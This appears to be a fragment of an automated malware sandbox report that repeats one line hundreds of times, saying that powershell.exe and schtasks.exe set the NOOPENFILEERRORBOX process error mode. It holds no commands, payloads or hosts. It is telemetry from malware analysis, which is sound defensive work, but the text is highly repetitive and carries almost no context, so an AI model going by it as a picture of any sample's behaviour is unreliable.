                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
